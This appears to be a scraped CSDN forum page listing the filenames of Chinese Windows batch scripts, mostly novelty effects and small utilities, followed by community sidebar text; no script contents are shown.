调用系统气泡.cmd 超级硬盘杀手.bat 跳舞机.bat 跳舞机.cmd 身份证信息查询.cmd 身份证号码格式.txt 输出指定行的内容.cmd 输出金字塔.cmd 过滤敏感字符.cmd 过滤相同行内容.cmd 还原从QQ上复制下来的内容.cmd 进入全屏幕界面.cmd 进度特效.cmd 逐行逐字显示文本.cmd 通过inf重启电脑.cmd 重命名administrator账号.bat 防ARP.bat 阿拉伯与罗马数字互转程序.cmd 阿拉伯数字转为罗马数字.cmd 限制条件批量建立文件夹.cmd 随机数.bat 颜色.bat 飞入+变色字.cmd 魔法.bat 黑客帝国里数码雨.cmd

13,822

社区成员

发帖
与我相关
我的任务
社区描述
C++ Builder相关内容讨论区
社区管理员
  • 基础类社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧